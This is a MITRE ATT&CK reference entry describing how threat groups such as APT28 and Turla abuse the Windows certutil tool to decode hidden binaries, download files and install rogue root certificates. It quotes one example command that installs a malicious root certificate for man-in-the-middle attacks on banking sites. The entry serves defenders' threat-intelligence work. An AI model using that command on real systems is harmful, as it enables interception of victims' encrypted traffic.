Register to stream ATT&CKcon 2.0 October 29-30

certutil

certutil is a command-line utility that can be used to obtain certificate authority information and configure Certificate Services. [1]

ID: S0160
Associated Software: certutil.exe
Type: TOOL
Platforms: Windows
Version: 1.0

Techniques Used

Domain ID Name Use
Enterprise T1140 Deobfuscate/Decode Files or Information certutil has been used to decode binaries hidden inside certificate files as Base64 information. [3]
Enterprise T1130 Install Root Certificate certutil can be used to install browser root certificates as a precursor to performing man-in-the-middle between connections to banking websites. Example command: certutil -addstore -f -user ROOT ProgramData\cert512121.der. [2]
Enterprise T1105 Remote File Copy certutil can be used to download files from a given URL. [1] [4]

Groups That Use This Software

ID Name References
G0075 Rancor [5]
G0045 menuPass [6] [7]
G0007 APT28 [8]
G0049 OilRig [9]
G0010 Turla [10]

References